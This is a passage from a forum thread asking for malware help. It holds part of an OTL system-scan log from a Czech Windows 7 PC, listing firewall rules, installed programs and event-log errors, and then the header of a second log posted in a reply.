"{3547C78F-BDDB-4BE1-8CC7-B3F8493A54EC}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{3A08F470-61DE-478E-9452-9F75844625E2}" = protocol=6 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{3A20B50C-8E19-422D-A0A9-B72D17FE6011}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\counter-strike global offensive\csgo.exe |
"{40A12CFE-354F-4D7A-969F-6EA7BE3F1382}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\half-life\hl.exe |
"{48FC8092-0AFF-45B6-94A3-CDF588375A7C}" = protocol=17 | dir=in | app=d:\steam\bin\steamwebhelper.exe |
"{4BB28D30-B069-4BFB-9A4C-54D0B268C1EB}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{4C8C5559-8EFD-4F20-ACC2-AFC0C041069D}" = protocol=17 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{52817C2E-1D95-4C53-ADB7-7B876EF9F058}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{52C34AAF-3A1F-4FA2-BBD5-D2CDCC2A5351}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{53880A7A-CA20-4C1A-B2DC-7A6FEAAF82D9}" = protocol=17 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{5489B103-C355-4393-8B7D-D3E393E3E500}" = protocol=6 | dir=in | app=d:\steam\bin\steamwebhelper.exe |
"{54F646BD-BAFF-410B-8DDE-3843D90FC259}" = protocol=6 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{66CEEB91-A77D-4CE3-9D55-A93D1879FF3E}" = protocol=6 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{69966129-DFD0-4C12-BDF2-A797B1B46B73}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{699772A2-FDDD-4379-974D-BE4376461D78}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\age2hd\launcher.exe |
"{6D1FFE68-D05B-4DFC-A635-325BEC489D8C}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer.exe |
"{705F1A4D-37E6-47B6-80FD-1A9276AFA2CF}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{778689DE-904F-4299-A999-63032999E413}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\half-life\hl.exe |
"{79EEFABF-5A71-46BF-8515-3E2CF3667F3E}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{7FE58982-8577-4DB1-94EA-6CCB8ADB478B}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{82A0EF9E-BF1C-4FA0-A012-08F2DFE4965C}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{83EA0160-6001-478C-81E7-AADD381FBF4F}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\counter-strike global offensive\csgo.exe |
"{8CD13A0D-CEFB-4D1C-8635-C1FCA7BBC0EF}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{8F6E208E-F30C-4824-AF72-2FBE55E29D2D}" = protocol=17 | dir=in | app=c:\users\lobo\appdata\local\temp\utlite0\utorrent.exe |
"{94E1E73C-441E-43CB-B450-376F19EC846A}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_launcher.exe |
"{953074C7-1363-41FE-BF2F-8D4F6D8073ED}" = protocol=6 | dir=in | app=c:\program files\hp\hp deskjet 2050 j510 series\bin\usbsetup.exe |
"{9608C3E3-D9AB-46FD-9B59-92DDCC38A97B}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer.exe |
"{9905F10A-C881-4F79-8EBE-E6C565501548}" = protocol=17 | dir=in | app=c:\program files (x86)\checkpoint\zonealarm\vsmon.exe |
"{9ED87611-51E2-4A29-AE0B-910048A4469A}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{9F29A904-78AB-410F-9FC6-2E699EEFBE4A}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{A295C5DC-2249-42A6-9ACD-5DC92333F8BB}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{A77D31B8-8211-4C11-84BF-43CA60B94441}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_dx11.exe |
"{AA75BAA4-D819-42FC-A982-B08BCBB0A0DD}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp.exe |
"{AD0B779A-A37E-4AC2-AD01-0020498695E6}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{BC4ECE41-8E23-47C8-B9BD-278B3282C941}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{C0A30F5F-5FA3-4C42-B72B-C3B31ECA761B}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp.exe |
"{C26F4848-B608-4760-B8E7-82084DB7FF71}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{C310C8DF-62C4-4B3C-9301-73B3BDAD0EA6}" = dir=in | app=c:\program files (x86)\common files\apple\apple application support\webkit2webprocess.exe |
"{CA4DD3B9-71DD-481D-A6F9-BD3F58F52A9B}" = protocol=6 | dir=in | app=c:\users\lobo\appdata\local\temp\utlite0\utorrent.exe |
"{CAC0525A-5611-44F0-952E-F39772BBE64F}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{CCD3F583-9176-4256-A6BA-8557D490D5D8}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{CED16A4C-8E97-4003-8253-E3E28ABBEF62}" = protocol=17 | dir=in | app=c:\program files\hp\hp deskjet 2050 j510 series\bin\usbsetup.exe |
"{CF42C394-3809-47DE-A833-9F238B944DBE}" = dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{CF6D65B1-1C0D-4D92-BED6-C83B7A2C4D96}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{CF8E5146-D07E-4B50-BE51-C9E346CF6262}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{DC0B081B-B6DB-4939-8196-633C1BACAB27}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\aliens vs predator\avp_dx11.exe |
"{EA6E6682-5EF7-4928-B2EA-4078FD5B43CF}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\age2hd\launcher.exe |
"{EA9E4C5F-F14F-417D-B035-6F04EF6E4778}" = protocol=6 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{EC487CD1-2266-44B2-823E-463E4DB4B0E1}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{ED15B389-B2D3-47FA-8D83-D6C1E33E29EF}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{EE98473E-0BB7-4BED-8EC0-B037A349C97C}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version9\teamviewer_service.exe |
"{F6204AC4-B9DC-4E60-8666-138FFDA77E92}" = protocol=6 | dir=in | app=d:\steam\steamapps\common\dota 2 beta\dota.exe |
"{F6C26DFB-07D7-48C0-8B68-F27151F22869}" = protocol=17 | dir=in | app=d:\steam\steamapps\common\rocksmith\rocksmith.exe |
"TCP Query User{64229DA1-8372-4AEA-98AD-EDC0A8FAE96B}C:\qip 2012\qip.exe" = protocol=6 | dir=in | app=c:\qip 2012\qip.exe |
"TCP Query User{6684E269-B860-4997-869C-9F965777549B}C:\program files (x86)\qip 2012\qip.exe" = protocol=6 | dir=in | app=c:\program files (x86)\qip 2012\qip.exe |
"TCP Query User{D62ECD30-96DC-4C56-9B0D-E4595FCA3111}C:\qip 2010\qip.exe" = protocol=6 | dir=in | app=c:\qip 2010\qip.exe |
"UDP Query User{19507617-7C98-4AE2-B55F-5E90295008E9}C:\qip 2012\qip.exe" = protocol=17 | dir=in | app=c:\qip 2012\qip.exe |
"UDP Query User{6DA69AE1-D934-4D53-8692-D9235B1639FC}C:\program files (x86)\qip 2012\qip.exe" = protocol=17 | dir=in | app=c:\program files (x86)\qip 2012\qip.exe |
"UDP Query User{99F93718-9F76-4CDE-864E-CC5A0B3E6DF5}C:\qip 2010\qip.exe" = protocol=17 | dir=in | app=c:\qip 2010\qip.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0E8670B8-3965-4930-ADA6-570348B67153}" = Microsoft SQL Server 2012 Transact-SQL ScriptDom
"{13417784-A359-3CDD-8DE1-B7108707D647}" = Visual Studio 2012 Prerequisites - ENU Language Pack
"{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}" = Microsoft .NET Framework 4.5
"{29C93182-34F6-3275-A18D-59326851CD57}" = Microsoft Windows SDK for Visual Studio 2008 .NET Framework Tools
"{2B997E80-3BEC-3222-9114-98DBE1182B2E}" = Microsoft Visual C++ 2012 x64 Debug Runtime - 11.0.50727
"{2BFA9B05-7418-4EDE-A6FC-620427BAAAA3}" = Crystal Reports Basic Runtime for Visual Studio 2008 (x64)
"{49D665A2-4C2A-476E-9AB8-FCC425F526FC}" = Microsoft SQL Server 2012 Native Client
"{50822200-2E95-4E62-A8D8-41C3B308DF5E}" = Microsoft SQL Server VSS Writer
"{5DE154DF-A55E-4FA5-BE59-32E78FCACF3E}" = Microsoft Windows SDK for Visual Studio 2008 Headers and Libraries
"{5FDC06BF-3D3D-4367-8FFB-4FAFCB61972D}" = Cisco Systems VPN Client 5.0.07.0440
"{61862D7C-CDBC-48D5-8AE1-3B8BD1E23BC5}" = Visual Studio 2012 Prerequisites
"{62EED300-E841-4083-A1D6-60B906271804}" = Microsoft Windows SDK for Visual Studio 2008 Tools
"{6390461E-D4C5-44ED-A783-9823ED17BF79}" = Základní software zařízení HP Deskjet 2050 J510 series
"{64D5BBC6-5270-3711-AA39-31C1087AF4E6}" = Microsoft Visual Studio 2008 Remote Debugger - ENU
"{68A48EF1-DF03-394F-AF40-1E4FE42BB8DD}" = Microsoft Visual Studio Team Foundation Server 2012 Object Model Language Pack - ENU
"{6E740973-8E71-42F9-A910-C18452E60450}" = Microsoft SQL Server Native Client
"{6F07A6C2-9068-3673-A120-DC10012468C6}" = Microsoft Visual Studio Team Foundation Server 2012 Object Model
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{85BC0DCB-69E5-4279-AA25-F108EF896588}_is1" = IK Multimedia Authorization Manager version 1.0.10
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1029" = Microsoft .NET Framework 4.5 CSY Language Pack
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5
"{983073CD-FAAF-4907-AA07-037DBA73B8EE}" = ESET Smart Security
"{9aa5f39c-a8de-46b0-919a-0248f8bc8490}" = Microsoft Windows SDK for Visual Studio 2008 SDK Reference Assemblies and IntelliSense
"{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}" = Microsoft SQL Server 2012 Command Line Utilities
"{A2CB1ACB-94A2-32BA-A15E-7D80319F7589}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727
"{A4F0DB87-3269-34FE-AFFE-4168FDFA4A22}" = Microsoft .NET Framework 4.5 CSY Language Pack
"{A992BBAA-723D-4574-A07F-983BF8FAA3E1}" = Microsoft Windows SDK for Visual Studio 2008 Win32 Tools
"{AC53FC8B-EE18-3F9C-9B59-60937D0B182C}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision" = NVIDIA Ovladač 3D Vision 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = Ovládací panel NVIDIA 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Ovladače grafiky 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA Ovladač řídící jednotky 3D Vision 314.22
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA Systémový software PhysX 9.12.1031
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update" = Aktualizace NVIDIA 1.12.12
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA Ovladač HD audia 1.3.23.1
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components
"{BEB0F91E-F2EA-48A1-B938-7857ABF2A93D}" = Microsoft SQL Server 2012 Transact-SQL Compiler Service
"{D0360940-CCC6-11E3-B9C6-F04DA23A5C58}" = Vegas Pro 13.0 (64-bit)
"{D10D0851-CCC6-11E3-9ED2-F04DA23A5C58}" = MSVCRT Redists
"{D3E39E77-0EB4-36FB-B97A-8C8AB21B9A45}" = Visual Studio .NET Prerequisites - English
"{D4BD27CF-BFBC-11E3-9B8F-F04DA23A5C58}" = MSVCRT Redists
"{DA5202AC-12BF-4330-B8EA-BC77F991FA1C}_is1" = AmpliTube 3 version 3.14.0
"{EF8B1A2E-9CCB-3AB2-91E3-4EEDAB1294E1}" = Microsoft Device Emulator (64 bit) version 3.0 - ENU
"{FE4222BB-74BE-48EC-8314-9CAC9A24F02F}" = DigiTech RP155 Drivers
"CrystalDiskMark_is1" = CrystalDiskMark 3.0.2c
"doPDF 7 printer_is1" = doPDF 7.3 printer
"Matlab R2011b" = MATLAB R2011b
"Microsoft Visual Studio 2008 Remote Debugger - ENU" = Microsoft Visual Studio 2008 Remote Debugger - ENU
"Sublime Text 3_is1" = Sublime Text Build 3059
"TeamSpeak 3 Client" = TeamSpeak 3 Client
"WinRAR archiver" = WinRAR 4.20 (64-bit)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{07300F01-89CA-4CF8-92BD-2A605EB83C95}" = EasySaver B9.1214.1
"{1C163D33-33B3-33EB-A617-0D4D852BE8E1}" = Microsoft Visual C++ 2012 x86 Debug Runtime - 11.0.50727
"{1F8E06E2-BA93-40DC-B183-E024CBD853A8}" = Microsoft Visual C++ 2012 Compilers
"{20fc1ec7-3058-48d4-80f8-e1cfd52391c7}" = Microsoft Visual Studio Professional 2012
"{241F2BF7-69EB-42A4-9156-96B2426C7504}" = Microsoft SQL Server Compact 3.5 for Devices ENU
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype™ 6.20
"{26918E50-6EDC-4A59-A31E-E9C1EF06F1BC}_is1" = Batch XLS TO XLSX Converter 2009
"{26A24AE4-039D-4CA4-87B4-2F83217021FF}" = Java 7 Update 45
"{2750B389-A2D2-4953-99CA-27C1F2A8E6FD}" = Microsoft SQL Server 2005 Tools Express Edition
"{291B3A3B-F808-45B8-8113-DF232FCB6C82}" = Microsoft .NET Compact Framework 3.5
"{29F259D7-C517-3EED-84B4-237573CFD39C}" = Microsoft Visual C++ 2012 Microsoft Foundation Class Libraries
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}" = Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)
"{2E5C075E-11AB-4BDD-918C-7B9A68953FF8}" = Microsoft SQL Server Compact 3.5 Design Tools ENU
"{2F73A7B2-E50E-39A6-9ABC-EF89E4C62E36}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727
"{330E5D98-20D2-4CA4-AE51-FCB8AA80F634}" = Microsoft Visual Studio 2012 Devenv
"{388E4B09-3E71-4649-8921-F44A3A2954A7}" = Microsoft Visual Studio 2005 Tools for Office Runtime
"{38FC6E9A-F719-431A-A83D-4C86D5FD6555}" = Microsoft Visual Studio 2012 Shell (Minimum) Resources
"{457D7505-D665-4F95-91C3-ECB8C56E9ACA}" = Easy Tune 6 B10.0516.1
"{47107F5F-FDEC-4A01-896C-E76245743F1A}" = X-Edit
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}" = Microsoft SQL Server Setup Support Files (English)
"{5CBFF3F3-2D40-34EE-BCA5-A95BC19E400D}" = Microsoft .NET Framework 4.5 Multi-Targeting Pack
"{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}" = Apple Application Support
"{5E5D3141-7714-4B2E-8BF2-650C8EF65E3E}" = MySQL Connector Net 6.9.5
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{616C96AC-9B4B-4446-8583-A10C2FDA24A4}" = ZoneAlarm Firewall
"{631471BE-DEAB-454B-A9AC-CE3EB42C28B3}" = Microsoft ASP.NET Web Pages
"{6753B40C-0FBD-3BED-8A9D-0ACAC2DCD85D}" = Microsoft Document Explorer 2008
"{6889EE56-1816-4E89-94DF-9F56E7804039}_is1" = Counter-Strike 1.6 Non-Steam patch v36
"{6C9F6D23-E9AD-43C9-B43A-011562AAF876}" = Windows Mobile 5.0 SDK R2 for Pocket PC
"{6D6D43E5-218C-4B05-92D3-2240810F4760}" = Microsoft SQL Server 2012 T-SQL Language Service
"{731C183B-86A0-3442-BE55-68A7C92581E9}" = Microsoft Visual C++ 2012 Extended Libraries
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{79BF4901-1EC4-4726-B3C2-A7859706C6E7}" = League of Legends
"{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}" = HP Deskjet 2050 J510 series Nápověda
"{800F484E-9D69-492D-B656-7BAA32586142}" = Microsoft Visual Studio 2012 Shell (Minimum)
"{820C677A-41B2-48C3-8136-FEE35A052E73}" = Microsoft Visual Studio 2012 Shell (Minimum) Interop Assemblies
"{830A6D6D-D9FA-4171-9288-1FCFB6C7367E}" = Wonderware InTouch
"{86D8A96B-1911-4C3F-AA16-0B47E053E492}" = PDF Architect
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver For Windows 7
"{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}" = NVIDIA PhysX
"{8E44476E-11BF-41A5-A457-266FD27F344D}" = ZoneAlarm Security
"{8FB53850-246A-3507-8ADE-0060093FFEA6}" = Visual Studio Tools for the Office system 3.0 Runtime
"{90110405-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003
"{90120000-0020-0405-0000-0000000FF1CE}" = Sada Compatibility Pack pro systém Office 2007
"{90120000-0021-0000-0000-0000000FF1CE}" = Microsoft Office Visual Web Developer 2007
"{90120000-0021-0409-0000-0000000FF1CE}" = Microsoft Office Visual Web Developer MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{93489CA8-6656-33A0-A5AC-E0EDEDB17C3E}" = Microsoft Visual Studio Professional 2012
"{9656F3AC-6BA9-43F0-ABED-F214B5DAB27B}" = Windows Mobile 5.0 SDK R2 for Smartphone
"{980A182F-E0A2-4A40-94C1-AE0C1235902E}" = Pando Media Booster
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A33B83D-FFC4-44CF-BEEF-632DECEF2FCD}" = Microsoft SQL Server Database Publishing Wizard 1.2
"{A4366F69-CE22-4DB7-9C8C-46A5845AF997}" = Microsoft Visual C++ 2012 Compilers - ENU Resources
"{A62392EE-03CB-4FA8-8E79-B5F95A346FB3}" = Kontrola české gramatiky pro sadu Microsoft Office 2003
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AA467959-A1D6-4F45-90CD-11DC57733F32}" = Crystal Reports Basic for Visual Studio 2008
"{AC76BA86-7AD7-1029-7B44-AB0000000001}" = Adobe Reader XI (11.0.09) - Czech
"{AD1AEE2A-D9C0-3FAC-8D6B-B5E07B47257B}" = Microsoft Visual C++ 2012 Core Libraries
"{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}" = HP Update
"{B1465D1D-6427-4CA1-AE29-8B699209E663}" = Microsoft Visual Studio 2012 Devenv Resources
"{B2DC3F08-2EB2-49A5-AA24-15DFC8B1CB83}" = @BIOS
"{BAD0254F-9BDB-3D14-A5AC-9C0EF51F3D09}" = Microsoft Portable Library Multi-Targeting Pack Language Pack - enu
"{BCC899FE-2DAA-460C-A5FB-60291E73D9C3}" = Microsoft SQL Server Compact 3.5 ENU
"{C4CAD994-6EA2-3121-8352-DA593150B322}" = Microsoft Portable Library Multi-Targeting Pack
"{C6640705-7479-4EE5-BC86-879F05F65E74}" = Google Drive
"{C75FAD21-EC08-42F3-92D6-C9C0AB355345}" = AutoGreen B10.0517.1
"{C8C8387B-A98B-44E8-807A-1A9B7F51FFDA}" = Blaze Media Pro
"{D7DAD1E4-45F4-3B2B-899A-EA728167EC4F}" = Microsoft Visual Studio 2008 Professional Edition - ENU
"{DCDEC776-BADD-48B9-8F9A-DFF513C3D7FA}" = Microsoft ASP.NET MVC 3
"{DE602740-B2BE-4227-957E-0E11075C43F4}" = ZoneAlarm Antivirus
"{E040B65B-8683-4228-8C33-D44A141E40EA}" = Secure Download Manager
"{E8870D92-54F6-4AC7-82D0-7DCDFB1F00AE}" = Cs Non Steam
"{EDDF99D9-9FE3-4871-A7DB-D1522C51EE9A}" = Microsoft .NET Compact Framework 2.0 SP2
"{EDFE2142-CFB3-44AB-A961-DE85F6408A28}" = Sentinel Protection Installer 7.3.2
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{FDB30193-FDA0-3DAA-ACCA-A75EEFE53607}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727
"{FF29527A-44CD-3422-945E-981A13584000}" = VC Runtimes MSI
"Adobe Flash Player Plugin" = Adobe Flash Player 15 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"aTube Catcher" = aTube Catcher
"Audacity_is1" = Audacity 2.0.5
"AVS4YOU Video Converter 7_is1" = AVS Video Converter 8.5
"Battle.net" = Battle.net
"Blaze Media Pro" = Blaze Media Pro
"Comodo Dragon" = Comodo Dragon
"DAEMON Tools Lite" = DAEMON Tools Lite
"DigiTech RP155 Drivers" = DigiTech RP155 Drivers
"Fraps" = Fraps (remove only)
"Free Video Flip and Rotate_is1" = Free Video Flip and Rotate version 2.1.9.822
"GetRight_is1" = GetRight
"Google Chrome" = Google Chrome
"Hearthstone" = Hearthstone
"HP Photo Creations" = HP Photo Creations
"HyperCam 2" = HyperCam 2
"InstallShield_{457D7505-D665-4F95-91C3-ECB8C56E9ACA}" = Easy Tune 6 B10.0516.1
"InstallShield_{C75FAD21-EC08-42F3-92D6-C9C0AB355345}" = AutoGreen B10.0517.1
"IsoBuster_is1" = IsoBuster 3.3
"KLiteCodecPack_is1" = K-Lite Codec Pack 9.8.0 (Full)
"League of Legends 3.0.1" = League of Legends
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware verze 2.0.4.1028
"Microsoft Document Explorer 2008" = Microsoft Document Explorer 2008
"Microsoft SQL Server 2005" = Microsoft SQL Server 2005
"Microsoft Visual Studio 2005 Tools for Office Runtime" = Microsoft Visual Studio 2005 Tools for Office Runtime
"Microsoft Visual Studio 2008 Professional Edition - ENU" = Microsoft Visual Studio 2008 Professional Edition - ENU
"Mozilla Firefox 33.1 (x86 cs)" = Mozilla Firefox 33.1 (x86 cs)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"NVIDIAStereo" = NVIDIA Stereoscopic 3D Driver
"PSPad editor_is1" = PSPad editor
"QuicktimeAlt_is1" = QuickTime Alternative 3.2.0
"Razer Game Booster_is1" = Razer Game Booster
"REAPER" = REAPER
"Smart File Advisor_is1" = Smart File Advisor 1.2.0
"SopCast" = SopCast 3.8.3
"StarCraft II" = StarCraft II
"Steam App 10" = Counter-Strike
"Steam App 205190" = Rocksmith
"Steam App 221380" = Age of Empires II: HD Edition
"TeamViewer 9" = TeamViewer 9
"The KMPlayer" = KMPlayer (remove only)
"Visual Studio Tools for the Office system 3.0 Runtime" = Visual Studio Tools for the Office system 3.0 Runtime
"VisualWebDeveloper" = Microsoft Visual Studio Web Authoring Component
"WinGimp-2.0_is1" = GIMP 2.6.11
"xampp" = XAMPP
"X-Edit" = X-Edit
"ZoneAlarm Free Firewall" = ZoneAlarm Free Firewall

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-2861910011-920187971-3878467655-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"QIP 2012" = QIP 2012 4.0.8866
"UnityWebPlayer" = Unity Web Player
"zonealarm" = ZoneAlarm Security Toolbar

========== Last 20 Event Log Errors ==========

[ Application Events ]
Error - 18.10.2014 3:48:14 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 18.10.2014 3:48:14 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 19.10.2014 3:46:27 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 19.10.2014 3:46:27 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 20.10.2014 1:04:09 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 20.10.2014 1:04:09 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 21.10.2014 5:55:58 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 21.10.2014 5:55:58 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

Error - 22.10.2014 2:37:56 | Computer Name = Lobo-PC | Source = Software Protection Platform Service | ID = 8198
Description = Aktivace licence (slui.exe) se nezdařila s následujícím kódem chyby:
0x800401F9

Error - 22.10.2014 2:37:56 | Computer Name = Lobo-PC | Source = Winlogon | ID = 4103
Description = Aktivace licence systému Windows se nezdařila. Chyba 0x00000000.

[ System Events ]
Error - 9.12.2014 3:37:46 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 3:37:50 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 3:39:41 | Computer Name = Lobo-PC | Source = Service Control Manager | ID = 7000
Description = Služba Služba Google Update (gupdate) neuspěla při spuštění v důsledku
následující chyby: %%2

Error - 9.12.2014 8:41:33 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:41:37 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:41:59 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:42:03 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 8:43:47 | Computer Name = Lobo-PC | Source = Service Control Manager | ID = 7000
Description = Služba Služba Google Update (gupdate) neuspěla při spuštění v důsledku
následující chyby: %%2

Error - 9.12.2014 9:06:11 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.

Error - 9.12.2014 9:06:19 | Computer Name = Lobo-PC | Source = Microsoft-Windows-DNS-Client | ID = 1012
Description = Při pokusu o načtení souboru místních hostitelů došlo k chybě.


< End of report >

chvostik
Visitor
Posts: 31
Registered: 04 Apr 2008 17:37

Re: Malware - please check my log

#4 Post by chvostik »

OTL logfile created on: 9.12.2014 17:34:27 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Lobo\Desktop
64bit- Ultimate Edition (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
